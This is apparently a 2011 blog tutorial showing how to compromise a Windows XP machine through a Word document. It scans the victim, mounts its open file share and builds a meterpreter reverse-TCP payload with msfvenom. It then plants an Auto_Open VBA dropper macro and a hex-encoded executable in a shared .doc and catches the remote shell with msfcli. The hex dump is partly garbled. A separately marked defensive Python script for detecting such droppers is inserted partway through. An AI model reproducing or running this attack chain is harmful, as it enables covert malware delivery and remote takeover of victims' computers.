Friday, 28 October 2011

Metasploit X MS.Office Word 2007 : Metasploit

I never get tired of sharing, and hopefully someone will want to try what I share this time. This time I will show how to exploit Windows XP SP2 through Microsoft Office 2007.
It sounds odd, but it really works.

Let's get straight to it.

Preparation:
1. nmap ---> port scanning
2. msfcli ---> executing the exploit
3. msfencoder ---> compiling the buffer overflow shell code


First, let's check Metasploit. Enter the command:

msf > show encoders




Output:
 
Encoders
========

   Name                    Disclosure Date  Rank       Description
   ----                    ---------------  ----       -----------
   cmd/generic_sh                           good       Generic Shell Variable Substitution Command Encoder
   cmd/ifs                                  low        Generic ${IFS} Substitution Command Encoder
   cmd/printf_php_mq                        manual     printf(1) via PHP magic_quotes Utility Command Encoder
   generic/none                             normal     The "none" Encoder
   mipsbe/longxor                           normal     XOR Encoder
   mipsle/longxor                           normal     XOR Encoder
   php/base64                               great      PHP Base64 encoder
   ppc/longxor                              normal     PPC LongXOR Encoder
   ppc/longxor_tag                          normal     PPC LongXOR Encoder
   sparc/longxor_tag                        normal     SPARC DWORD XOR Encoder
   x64/xor                                  normal     XOR Encoder
   x86/alpha_mixed                          low        Alpha2 Alphanumeric Mixedcase Encoder
   x86/alpha_upper                          low        Alpha2 Alphanumeric Uppercase Encoder
   x86/avoid_utf8_tolower                   manual     Avoid UTF8/tolower
   x86/call4_dword_xor                      normal     Call+4 Dword XOR Encoder
   x86/context_cpuid                        manual     CPUID-based Context Keyed Payload Encoder
   x86/context_stat                         manual     stat(2)-based Context Keyed Payload Encoder
   x86/context_time                         manual     time(2)-based Context Keyed Payload Encoder
   x86/countdown                            normal     Single-byte XOR Countdown Encoder
   x86/fnstenv_mov                          normal     Variable-length Fnstenv/mov Dword XOR Encoder
   x86/jmp_call_additive                    normal     Jump/Call XOR Additive Feedback Encoder
   x86/nonalpha                             low        Non-Alpha Encoder
   x86/nonupper                             low        Non-Upper Encoder
   x86/shikata_ga_nai                       excellent  Polymorphic XOR Additive Feedback Encoder
   x86/single_static_bit                    manual     Single Static Bit
   x86/unicode_mixed                        manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
   x86/unicode_upper                        manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

In this tutorial we will use the x86/shikata_ga_nai encoder. In Japanese, shikata_ga_nai means "it cannot be helped" or "there is no hope left".

Situation:
1. My IP address is 192.168.56.101
2. The victim's IP address is 192.168.56.50

Briefing:
1. Know that the victim has port 445 open for file sharing.
2. Build the shell code with msfvenom, then compile it with the x86/shikata_ga_nai encoder.
3. Copy the exploit and payload into a file with a .doc or .docx extension.
4. Wait until the victim opens that file.
5. Game over.

Tutorial:
1. First, scan the ports with the help of nmap
root@red-dragon:~# nmap 192.168.56.50 -Pn -O -A
Output:
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-22 15:04 WIT
Nmap scan report 192.168.56.50
Host is up (0.0000070s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
445/tcp open  microsoft-ds


We can see that the victim has port 445 open.

2. Next, we will access the victim's shared documents.
root@red-dragon:~# smbclient -L \\192.168.56.50 -N

Output:
Domain =[VM-XP-SP2] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

    Sharename    Type        Comment
    ---------    ----        -------

    IPC$        IPC        Remote IPC
    Documents    Disk      
    ADMIN$        Disk        Remote Admin
    C$        Disk        Default Share
Session request to 192.168.56.50 failed (Called name not present)
Session request to 192 failed (Called name not present)
Domain =[VM-XP-SP2] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

    Server        Comment
    ------        -------

    Workgroup    Master
    ---------    ------


3. Create a directory for the share, then mount the share on that directory.

root@red-dragon:~# mkdir /mnt/shared
root@red-dragon:~# smbmount \\192.168.56.50 /mnt/shared -o rw
password:
[empty] [press enter]
root@red-dragon:~# cd /mnt/shared && ls -l

Output:
total 21
-rwxr-xr-x 0  root root     62    2011-08-19    01:12    desktop.ini
-rwxr-xr-x 0  root root     666    2011-08-19    01:30    Laporan.doc


4. Create a vnc directory, mount that directory, and copy Laporan.doc into it.

root@red-dragon:/mnt/shared# mkdir ../vnc
root@red-dragon:/mnt/shared# smbmount \\192.168.56.101/write /mnt/vnc -o rw
password: [empty] [press enter]
root@red-dragon:/mnt/shared# cp Laporan.doc ../vnc/

5. The next step is to create our own exploit and payload, which is then compiled with the x86/shikata_ga_nai encoder.

root@red-dragon:/mnt/shared# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=445 -e shikata_ga_nai -i 3 -f vba > ../vnc/vba.txt

6. This is the most important step, where we insert the exploit and payload into the document and then hand it back to the victim.
    a. Open Laporan.doc with Microsoft Word, then choose Tools -> Macro -> Visual Basic Editor.
    b. Choose Insert -> Module.
    c. Open vba.txt and copy the macro code into the Visual Basic Editor.

Explanation. Open vba.txt and you will find code like this:

'**************************************************************
'*
'* This code is now split into two pieces:
'*  1. The Macro. This must be copied into the Office document
'*     macro editor. This macro will run on startup.
'*
'*  2. The Data. The hex dump at the end of this output must be
'*     appended to the end of the document contents.
'*
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************
Sub Auto_Open()
Bla-Bla-Bla
'**************************************************************
'*
'* PAYLOAD DATA
'*
'**************************************************************

Ynmwjwddea
Bla-Bla-Bla

Then copy this part:

Sub Auto_Open()
    Xptzg12
End Sub
Sub Xptzg12()
    Dim Xptzg7 As Integer
    Dim Xptzg1 As String
    Dim Xptzg2 As String
    Dim Xptzg3 As Integer
    Dim Xptzg4 As Paragraph
    Dim Xptzg8 As Integer
    Dim Xptzg9 As Boolean
    Dim Xptzg5 As Integer
    Dim Xptzg11 As String
    Dim Xptzg6 As Byte
    Dim Ynmwjwddea as String
    Ynmwjwddea = "Ynmwjwddea"
    Xptzg1 = "bNzLqgWr.exe"
    Xptzg2 = Environ("USERPROFILE")
    ChDrive (Xptzg2)
    ChDir (Xptzg2)
    Xptzg3 = FreeFile()
    Open Xptzg1 For Binary As Xptzg3
    For Each Xptzg4 in ActiveDocument.Paragraphs
        DoEvents
            Xptzg11 = Xptzg4.Range.Text
        If (Xptzg9 = True) Then
            Xptzg8 = 1
            While (Xptzg8 < Len(Xptzg11))
                Xptzg6 = Mid(Xptzg11,Xptzg8,4)
                Put #Xptzg3, , Xptzg6
                Xptzg8 = Xptzg8 + 4
            Wend
        ElseIf (InStr(1,Xptzg11,Ynmwjwddea) > 0 And Len(Xptzg11) > 0) Then
            Xptzg9 = True
        End If
    Next
    Close #Xptzg3
    Xptzg13(Xptzg1)
End Sub
Sub Xptzg13(Xptzg10 As String)
    Dim Xptzg7 As Integer
    Dim Xptzg2 As String
    Xptzg2 = Environ("USERPROFILE")
    ChDrive (Xptzg2)
    ChDir (Xptzg2)
    Xptzg7 = Shell(Xptzg10, vbHide)
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub

Save, then copy the payload into the document body:

Ynmwjwddea
&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HE8&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H02&HHF6&H75&H0E&H6A&H3A&HA4&HFF&HD3&H8B&HF0&H83&HC4&HD3&H85&HE0&H74&H0A&H8D&H
 0&H00&H00&H00&H83&H7D&H3D&H00&H00&H00&H00&H00&H30&H00&H00&HDB&H00&H91&H00&H00&HB3&H00&H00&H00&H00&HA6&H00&H00&H00&H00&H00&H00&H00&H00&H00&H1C&H00&H00&H00&H00&H8E&H00&HD8&H65&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H18&H000&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H4E&H42&H31&H30&H00&H00&H00&H00&H36&H80&HC1&H4A&H01&H00&H00&H00&H43&H3A&H5C&H6C&H6F&H63&H61&H6C&H30&H5C&H61&H73&H66&H5C&H72&H65&H6C&H65&H61&H73&H65&H5C&H62&H75&H69&H6C&H64&H2D&H32&H2E&H32&H2E&H31&H34&H5C&H73&H75&H70&H70&H6F&H72&H74&H5C&H52&H65&H6C&H65&H61&H73&H65&H5C&H61&H62&H2E&H70&H64&H62&H00
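As an added defender-side example (not from the original post and not Metasploit's own code), the script below triages a document for the two halves of the dropper described above: the &H-encoded PE image pasted into the document body after a marker word, and the Auto_Open / Environ("USERPROFILE") / Open For Binary / Shell vbHide pattern in the macro source. The sample paragraphs, the sample macro text and the marker word are constructed for the example; a real scan would feed it paragraph text and macro source extracted from the file.

```python
import re

# Constructed sample: paragraphs of a document as plain text, laid out the way
# the macro above expects them: a marker paragraph, then paragraphs made only of
# &HXX tokens. The bytes are a constructed fragment, not a real executable.
MARKER = "Ynmwjwddea"  # marker word as shown on the page; real files use a random one

SAMPLE_PARAGRAPHS = [
    "Quarterly report",
    "Nothing unusual here.",
    MARKER,
    "&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00",
    "&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00",
]

# Constructed macro fragment with the indicators seen in the dropper macro.
SAMPLE_MACRO = '''Sub Auto_Open()
    Xptzg12
End Sub
Sub Xptzg12()
    Xptzg1 = "bNzLqgWr.exe"
    Xptzg2 = Environ("USERPROFILE")
    Open Xptzg1 For Binary As Xptzg3
    Put #Xptzg3, , Xptzg6
    Xptzg7 = Shell(Xptzg10, vbHide)
End Sub'''

HEX_TOKEN = re.compile(r"&H([0-9A-Fa-f]{2})")

# Indicators taken from the macro shown on the page; each is a regex over source.
MACRO_INDICATORS = {
    "auto_open": re.compile(r"\bAuto_?Open\b", re.I),
    "writes_exe": re.compile(r'"[^"]*\.exe"', re.I),
    "userprofile": re.compile(r'Environ\("USERPROFILE"\)', re.I),
    "binary_write": re.compile(r"\bOpen\b.*\bFor Binary\b", re.I),
    "hidden_shell": re.compile(r"\bShell\(.*vbHide", re.I),
}


def decode_hex_paragraphs(paragraphs, marker=None):
    """Return the bytes encoded as &HXX tokens in the paragraphs after `marker`.

    With marker=None every paragraph consisting only of &HXX tokens is decoded,
    which covers a document whose marker word is unknown to the analyst.
    """
    out = bytearray()
    armed = marker is None
    for para in paragraphs:
        text = para.strip()
        if not armed:
            if marker in text:
                armed = True
            continue
        tokens = HEX_TOKEN.findall(text)
        # accept only paragraphs that are nothing but &HXX tokens
        if tokens and HEX_TOKEN.sub("", text) == "":
            out.extend(int(t, 16) for t in tokens)
    return bytes(out)


def find_embedded_pe(paragraphs, marker=None):
    """Decode the hidden data and check it for a DOS/PE 'MZ' header."""
    data = decode_hex_paragraphs(paragraphs, marker)
    return {
        "decoded_bytes": len(data),
        "has_mz_header": data[:2] == b"MZ",
        # e_lfanew lives at 0x3C; only readable when enough bytes were recovered
        "pe_offset": int.from_bytes(data[0x3C:0x40], "little") if len(data) >= 0x40 else None,
    }


def score_macro(source):
    """Return the names of dropper indicators present in the macro source."""
    return [name for name, rx in MACRO_INDICATORS.items() if rx.search(source)]


def triage(paragraphs, macro_source, marker=None):
    """Combine both checks into a verdict: dropper, suspicious or clean."""
    pe = find_embedded_pe(paragraphs, marker)
    hits = score_macro(macro_source)
    if pe["has_mz_header"] and len(hits) >= 3:
        verdict = "dropper"
    elif pe["has_mz_header"] or hits:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "macro_hits": hits, **pe}


if __name__ == "__main__":
    print(triage(SAMPLE_PARAGRAPHS, SAMPLE_MACRO, MARKER))
```

The body check is deliberately independent of the macro check: a document whose body carries an MZ image in &H form is worth a look even if the macro was stripped or obfuscated, and a macro with the write-then-Shell pattern is worth a look even if the payload is stored some other way.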

Save the document. Then copy it to the victim's shared directory.

root@red-dragon:~# cp ../vnc/Laporan.doc ./
7. Execute the exploit and payload with msfcli.

root@red-dragon:~# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=445 E

Output:
[*] Please wait while we load the module tree...

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;          
_____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


       =[ metasploit v4.1.0-release [core:4.1 api:1.0]
+ -- --=[ 749 exploits - 384 auxiliary - 98 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r14024 updated today (2011.10.22)

PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.56.101
LPORT => 445
[*] Started reverse handler on 192.168.56.101:445
[*] Starting the payload handler...


8. When the victim opens the file, this is what happens:

PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.56.101
LPORT => 445
[*] Started reverse handler on 192.168.56.101:445
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 1921.68.56.50
[*] Meterpreter session 1 opened (192.168.56.101:445 -> 192.168.56.50:1809) at 2011-10-22 16:25:30 +007
Good luck trying it . . :D



Source: In Here
